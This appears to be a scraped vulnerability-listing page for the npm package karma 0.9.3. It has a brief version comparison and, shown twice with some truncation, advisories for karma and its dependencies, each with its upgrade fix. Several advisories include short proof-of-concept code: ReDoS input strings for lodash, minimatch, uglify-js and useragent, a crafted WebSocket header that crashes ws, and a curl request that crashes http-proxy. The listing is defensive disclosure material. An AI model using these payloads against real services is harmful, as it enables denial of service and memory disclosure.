Version Details and Security Vulnerabilities

📦

karma

0.9.3

Comparision Betweeen 0.9.3 and 0.9.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 0.9.3 Details

Karma 0.9.3 represents a minor iteration over version 0.9.2 in the popular JavaScript test runner. Both versions share the core functionality of providing a spectacular environment for testing JavaScript code across multiple browsers. Developers relying on Karma for automated testing will find both versions quite similar.

The key difference lies in the dependencies. Version 0.9.3 introduces "graceful-fs":"~1.2.1" and "useragent":"~2.0.4" as dependencies and updated the "di" dependency from a direct git repository link to "~0.0.1". These updates likely address underlying bugs or compatibility issues within the utilized libraries, ensuring smoother operation and stability. graceful-fs likely improves file system handling, while useragent probably refines browser detection capabilities. Switching from a git link to a standard versioned dependency for di indicates a more stable dependency management approach.

While both versions offer a robust suite of development dependencies for testing and linting, the core testing experience remains mostly consistent. Developers can confidently upgrade to 0.9.3, expecting the same familiar Karma workflow with potentially enhanced stability in file system operations and browser identification and also a more stable node-di integration. The upgrade ensures access to the latest dependency fixes and improvements, contributing to a more reliable testing environment.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

karma

0.9.3

Comparision Betweeen 0.9.3 and 0.9.2

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 0.9.3 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.9.3 of the package karma.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.9.3 of the package

Summary:

Cross-site Scripting in karma

Details:

karma prior to version 6.3.14 contains a cross-site scripting vulnerability.

Details about karma@0.9.3

Summary:

Open redirect in karma

Details:

Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.

Details about karma@0.9.3

Summary:

mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input

Details:

Affected versions of mime are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Recommendation

Update to version 2.0.3 or later.

Details about mime@1.2.11

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.12 or later.

Details about lodash@1.1.1

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.5 are vulnerable to prototype pollution.

The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.5 or later.

Details about lodash@1.1.1

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.11 are vulnerable to prototype pollution.

The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.11 or later.

Details about lodash@1.1.1

Summary:

Regular Expression Denial of Service (ReDoS) in lodash

Details:

lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled Resource Consumption. The impact is: Denial of service. The component is: Date handler. The attack vector is: Attacker provides very long strings, which the library attempts to match using a regular expression. The fixed version is: 4.7.11.

Details about lodash@1.1.1

Summary:

Regular Expression Denial of Service (ReDoS) in lodash

Details:

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

function build_blank(n) {
    var ret = "1"
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s) 
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);

Details about lodash@1.1.1

Summary:

Command Injection in lodash

Details:

lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

Details about lodash@1.1.1

Summary:

Incorrect Default Permissions in log4js

Details:

Impact

Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.

Patches

Fixed by:

https://github.com/log4js-node/log4js-node/pull/1141
https://github.com/log4js-node/streamroller/pull/87

Released to NPM in log4js@6.4.0

Workarounds

Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.

References

Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.

For more information

If you have any questions or comments about this advisory:

Open an issue in logj4s-node
Ask a question in the slack channel
Email us at gareth.nomiddlename@gmail.com

Details about log4js@0.6.38

Summary:

semver vulnerable to Regular Expression Denial of Service

Details:

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

Details about semver@4.3.6

Summary:

Regular Expression Denial of Service in minimatch

Details:

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Details about minimatch@0.2.14

Summary:

minimatch ReDoS vulnerability

Details:

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Details about minimatch@0.2.14

Summary:

CORS misconfiguration in socket.io

Details:

The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.

Details about socket.io@0.9.19

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

| Version range | Needs minor update? | |------------------|------------------------------------------------| | 4.6.2...latest | Nothing to do | | 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) | | 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@0.9.19

Summary:

Remote Memory Disclosure in ws

Details:

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

Details about ws@0.4.32

Summary:

DoS due to excessively large websocket message in ws

Details:

Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.

Recommendation

Update to version 1.1.1 or later. Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.

Details about ws@0.4.32

Summary:

Denial of Service in ws

Details:

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

Details about ws@0.4.32

Summary:

Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js

Details:

Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.

Recommendation

Upgrade UglifyJS to version >= 2.4.24.

Details about uglify-js@1.2.5

Summary:

Regular Expression Denial of Service in uglify-js

Details:

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s

$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s

Recommendation

Update to version 2.6.0 or later.

Details about uglify-js@1.2.5

Summary:

xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection

Details:

This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

Details about xmlhttprequest@1.4.2

Summary:

ReDoS via long UserAgent header in useragent

Details:

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Recommendation

Update to version 2.1.13 or later.

Details about useragent@2.0.10

Summary:

useragent Regular Expression Denial of Service vulnerability

Details:

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).

PoC

async function exploit() {
   const useragent = require(\"useragent\");

   // Create a malicious user-agent that leads to excessive backtracking
   const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';

   // Parse the malicious user-agent
   const agent = useragent.parse(maliciousUserAgent);

   // Call the toString method to trigger the vulnerability
   const result = await agent.device.toString();
   console.log(result);
}

await exploit();

Details about useragent@2.0.10

Summary:

Denial of Service in http-proxy

Details:

Versions of http-proxy prior to 1.18.1 are vulnerable to Denial of Service. An HTTP request with a long body triggers an ERR_HTTP_HEADERS_SENT unhandled exception that crashes the proxy server. This is only possible when the proxy server sets headers in the proxy request using the proxyReq.setHeader function.

For a proxy server running on http://localhost:3000, the following curl request triggers the unhandled exception:
curl -XPOST http://localhost:3000 -d "$(python -c 'print("x"*1025)')"

Recommendation

Upgrade to version 1.18.1 or later

Details about http-proxy@0.10.4

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.9.3 of the package karma.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.9.3 of the package

Summary:

Cross-site Scripting in karma

Details:

karma prior to version 6.3.14 contains a cross-site scripting vulnerability.

Details about karma@0.9.3

Summary:

Open redirect in karma

Details:

Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.

Details about karma@0.9.3

Summary:

mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input

Details:

Affected versions of mime are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Recommendation

Update to version 2.0.3 or later.

Details about mime@1.2.11

Summary:

Prototype Pollution in lodash

Details:

Recommendation

Update to version 4.17.12 or later.

Details about lodash@1.1.1

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.5 are vulnerable to prototype pollution.

Recommendation

Update to version 4.17.5 or later.

Details about lodash@1.1.1

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.11 are vulnerable to prototype pollution.

Recommendation

Update to version 4.17.11 or later.

Details about lodash@1.1.1

Summary:

Regular Expression Denial of Service (ReDoS) in lodash

Details:

Details about lodash@1.1.1

Summary:

Regular Expression Denial of Service (ReDoS) in lodash

Details:

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

function build_blank(n) {
    var ret = "1"
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s) 
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);

Details about lodash@1.1.1

Summary:

Command Injection in lodash

Details:

lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

Details about lodash@1.1.1

Summary:

Incorrect Default Permissions in log4js

Details:

Impact

Patches

Fixed by:

https://github.com/log4js-node/log4js-node/pull/1141
https://github.com/log4js-node/streamroller/pull/87

Released to NPM in log4js@6.4.0

Workarounds

Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.

References

Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.

For more information

If you have any questions or comments about this advisory:

Open an issue in logj4s-node
Ask a question in the slack channel
Email us at gareth.nomiddlename@gmail.com

Details about log4js@0.6.38

Summary:

semver vulnerable to Regular Expression Denial of Service

Details:

Details about semver@4.3.6

Summary:

Regular Expression Denial of Service in minimatch

Details:

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Details about minimatch@0.2.14

Summary:

minimatch ReDoS vulnerability

Details:

Details about minimatch@0.2.14

Summary:

CORS misconfiguration in socket.io

Details:

The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.

Details about socket.io@0.9.19

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@0.9.19

Summary:

Remote Memory Disclosure in ws

Details:

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

Details about ws@0.4.32

Summary:

DoS due to excessively large websocket message in ws

Details:

Recommendation

Update to version 1.1.1 or later. Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.

Details about ws@0.4.32

Summary:

Denial of Service in ws

Details:

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

Details about ws@0.4.32

Summary:

Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js

Details:

Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.

Recommendation

Upgrade UglifyJS to version >= 2.4.24.

Details about uglify-js@1.2.5

Summary:

Regular Expression Denial of Service in uglify-js

Details:

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s

$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s

Recommendation

Update to version 2.6.0 or later.

Details about uglify-js@1.2.5

Summary:

xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection

Details:

Details about xmlhttprequest@1.4.2

Summary:

ReDoS via long UserAgent header in useragent

Details:

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Recommendation

Update to version 2.1.13 or later.

Details about useragent@2.0.10

Summary:

useragent Regular Expression Denial of Service vulnerability

Details:

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).

PoC

async function exploit() {
   const useragent = require(\"useragent\");

   // Create a malicious user-agent that leads to excessive backtracking
   const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';

   // Parse the malicious user-agent
   const agent = useragent.parse(maliciousUserAgent);

   // Call the toString method to trigger the vulnerability
   const result = await agent.device.toString();
   console.log(result);
}

await exploit();

Details about useragent@2.0.10

Summary:

Denial of Service in http-proxy

Details:

For a proxy server running on http://localhost:3000, the following curl request triggers the unhandled exception:
curl -XPOST http://localhost:3000 -d "$(python -c 'print("x"*1025)')"

Recommendation

Upgrade to version 1.18.1 or later

Details about http-proxy@0.10.4

Version Details and Security Vulnerabilities

karma

Comparision Betweeen 0.9.3 and 0.9.2

Version 0.9.3 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

karma

Comparision Betweeen 0.9.3 and 0.9.2

Version 0.9.3 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

karma@0.9.3 GHSA-7x7c-qm48-pq9c 6.1

karma@0.9.3 GHSA-rc3x-jf5g-xvc5 5.4

mime@1.2.11 GHSA-wrvr-8mpx-r7pp 7.5

Recommendation

lodash@1.1.1 GHSA-jf85-cpcp-j695 9.1

Recommendation

lodash@1.1.1 GHSA-fvqr-27wr-82fm 6.5

Recommendation

lodash@1.1.1 GHSA-4xc9-xhrj-v574 N/A

Recommendation

lodash@1.1.1 GHSA-x5rq-j2xg-h7qm N/A

lodash@1.1.1 GHSA-29mw-wpgm-hmr9 5.3

lodash@1.1.1 GHSA-35jh-r3h4-6jhm 7.2

log4js@0.6.38 GHSA-82v2-mx6x-wq7q 5.5

Impact

Patches

Workarounds

References

For more information

semver@4.3.6 GHSA-c2qf-rxjj-qqgw 7.5

minimatch@0.2.14 GHSA-hxm2-r34f-qmc5 7.5

Proof of Concept

Recommendation

minimatch@0.2.14 GHSA-f8q6-p94x-37v3 7.5

socket.io@0.9.19 GHSA-fxwf-4rqh-v8g3 4.3

socket.io@0.9.19 GHSA-25hc-qcg6-38wj 6.9

Impact

Affected versions

Patches

Workarounds

For more information

References

ws@0.4.32 GHSA-2mhh-w6q8-5hxw N/A

Proof of Concept

Recommendation

ws@0.4.32 GHSA-6663-c963-2gqg N/A

Recommendation

ws@0.4.32 GHSA-5v72-xg48-5rpm 7.5

Proof of concept

Recommendation

uglify-js@1.2.5 GHSA-34r7-q49f-h37c 9.8

Recommendation

uglify-js@1.2.5 GHSA-c9f4-xj24-8jqx 7.5

Proof of Concept

Results

Recommendation

xmlhttprequest@1.4.2 GHSA-h4j5-c7cj-74xg 9.8

useragent@2.0.10 GHSA-pjmx-9xr3-82qr N/A

Proof of Concept

Recommendation

useragent@2.0.10 GHSA-mgfv-m47x-4wqp 6.6

PoC

http-proxy@0.10.4 GHSA-6x33-pw7p-hmpq 7.5

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

karma@0.9.3 GHSA-7x7c-qm48-pq9c 6.1

karma@0.9.3 GHSA-rc3x-jf5g-xvc5 5.4

mime@1.2.11 GHSA-wrvr-8mpx-r7pp 7.5

Recommendation

lodash@1.1.1 GHSA-jf85-cpcp-j695 9.1

Recommendation